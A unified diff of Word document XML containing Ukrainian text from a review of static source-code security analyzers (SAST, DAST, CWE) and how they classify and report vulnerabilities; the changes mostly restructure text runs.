-        </w:rPr>
-        <w:t>створених</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>для</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>виявлення</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>і</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>запобігання</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>експлуатації</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>програмних</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">помилок у вихідних кодах. Всі продукти, спрямовані на аналіз вихідного коду, можна умовно розділити на три типи: </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:firstLine="348"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Перша група </w:t>
+        <w:t>SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">туп до вихідних текстів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5038,7 +6025,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>включає в</w:t>
+        <w:t>в</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -5049,41 +6036,28 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> себе аналізатори коду веб-додатків і засоби щодо запобігання експлуатації вразливостей веб-сайтів. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:firstLine="348"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Друга група - аналізатори вбудованого коду, що дозволяють виявити проблемні місця в початкових текстах модулів, призначених для розширення функціональності корпоративних і виробничих систем. До таких модулів </w:t>
+        <w:t>ідсутн</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+          <w:lang w:val="uk-UA"/>
+        </w:rPr>
+        <w:t>ій</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5105,41 +6079,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідносяться програми для лінійки продуктів 1С, розширення CRM-систем, систем управління підприємством і систем SAP. </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="a3"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:firstLine="348"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Остання група призначена для аналізу вихідного коду на </w:t>
+        <w:t xml:space="preserve">ідповідності та можливість виконання вимог </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5161,7 +6101,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізних мовах програмування, що не відносяться до бізнес-додатків і веб-додатків. Такі аналізатори призначені для замовників і розробників програмного забезпечення. У тому числі дана група аналізаторів застосовується для використання методології захищеної розробки програмних продуктів. Аналізатори </w:t>
+        <w:t xml:space="preserve">ізних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5172,7 +6112,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>статичного</w:t>
+        <w:t>св</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -5183,7 +6123,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve"> коду знаходять проблеми і потенційно вразливі місця в початкових кодах і видають рекомендації для їх усунення. Варто зазначити, що більшість з аналізаторів </w:t>
+        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5194,7 +6134,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>в</w:t>
+        <w:t>п</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -5205,7 +6145,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідносяться до змішаних типів і виконують функції з аналізу широкого спектра програмних продуктів - веб-додатків, вбудованого коду і звичайного програмного забезпечення. Проте в даному огляді упор зроблений на застосування аналізаторів замовниками розробки, тому більша увага приділяється аналізатора веб-додатків і вбудованого коду. Аналізатори можуть містити </w:t>
+        <w:t xml:space="preserve">ідвантажуваних модулів, використовуваного стороннього програмного забезпечення і т. Д.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5216,7 +6156,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>р</w:t>
+        <w:t>автоматичному</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>
@@ -5227,7 +6167,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ізні механізми аналізу, але найбільш поширеним і універсальним є статичний аналіз вихідного коду - SAST (Static Application Security Testing), також існують методи динамічного аналізу - DAST (Dynamic Application Security Testing), що виконують перевірки коду при його виконанні, і різні гібридні варіанти, що поєднують різні типи аналізів. Динамічний аналіз є самостійним методом перевірки, </w:t>
+        <w:t xml:space="preserve"> виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5238,180 +6178,7 @@
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>який може розширювати можливості статичного аналізу або застосовуватися самостійно в тих випадках, коли дос</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">туп до вихідних текстів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ідсутн</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-          <w:lang w:val="uk-UA"/>
-        </w:rPr>
-        <w:t>ій</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. В даному огляді розглядаються тільки статичні аналізатори. Аналізатори вбудованого коду і веб-додатків розрізняються по набору характеристик. У нього входять не тільки якість аналізу і перелік підтримуваних програмних продуктів і мов програмування, а й додаткові механізми: можливість здійснення автоматичного виправлення помилок, наявність функцій щодо запобігання експлуатації помилок без змін коду, можливість поновлення вбудованої бази вразливостей і помилок програмування, наявність сертифікатів </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>в</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідповідності та можливість виконання вимог </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>р</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ізних регуляторів. Принципи роботи аналізаторів вихідного коду Загальні принципи роботи схожі для всіх класів аналізаторів: і аналізаторів вихідного коду веб-додатків, і аналізаторів вбудованого коду. Відмінність між цими типами продуктів - тільки в можливості визначити особливості виконання і взаємодії коду із зовнішнім </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>св</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>ітом, що відбивається в базах вразливостей аналізаторів. Велика частина аналізаторів, представлених на ринку, виконує функції обох класів, однаково добре перевіряючи як вбудовується в бізнес-додатки код, так і код веб-додатків. Вхідними даними для аналізатора вихідного коду є масив вихідних текстів програм і його залежностей (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>п</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ідвантажуваних модулів, використовуваного стороннього програмного забезпечення і т. Д.). Як результатів роботи все аналізатори видають звіт про виявлені вразливості і помилки програмування, додатково деякі аналізатори надають функції по </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>автоматичному</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> виправленню помилок. Варто зазначити, що автоматичне виправлення помилок не</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> завжди працює коректно, тому даний функціонал призначений тільки для розробників веб-додатків і вбудованих модулів, замовник продукту повинен спиратися тільки на фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
+        <w:t xml:space="preserve">фінальний звіт аналізатора і використовувати отримані дані для прийняття </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5454,7 +6221,6 @@
           <w:noProof/>
           <w:lang w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
             <wp:extent cx="5940425" cy="2083489"/>
@@ -5514,7 +6280,6 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
-          <w:lang w:val="en-US"/>
         </w:rPr>
       </w:pPr>
       <w:r>
@@ -5668,7 +6433,18 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
+        <w:t xml:space="preserve">ідтримкою яких займаються регулятори різних країн. Наприклад, в США використовується база CWE - Common Weakness Enumeration, обслуговуванням якої займається організація MITRE, підтримувана в тому числі Міністерством оборони США. Вимоги стандартів і рекомендації по захищеному програмування - існує як ряд державних і галузевих стандартів, що описують вимоги до безпечної </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="2A2A2A"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">розробці свпріложеній, так і ряд рекомендацій і «кращих практик» від світових експертів </w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
       <w:r>
@@ -5701,18 +6477,7 @@
           <w:szCs w:val="28"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t xml:space="preserve">Дані документи безпосередньо не описують помилки програмування, на </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="2A2A2A"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
+        <w:t>Дані документи безпосередньо не описують помилки програмування, на відміну від CWE, але містять перелік методів, які можуть бути перетворені для використання в статичному аналізаторі вихідного коду.</w:t>
       </w:r>
       <w:proofErr w:type="gramEnd"/>
       <w:r>

--- a/Bullshit.docx
+++ b/Bullshit.docx
@@ -8346,17 +8346,7 @@
           <w:szCs w:val="28"/>
           <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve"> вимог</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="212121"/>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t xml:space="preserve"> вимог </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -8899,17 +8889,7 @@
                 <w:szCs w:val="28"/>
                 <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
               </w:rPr>
-              <w:t>2</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:color w:val="212121"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-                <w:lang w:val="uk-UA" w:eastAsia="ru-RU"/>
-              </w:rPr>
-              <w:t>.1</w:t>
+              <w:t>2.1</w:t>
             </w:r>
           </w:p>
         </w:tc>
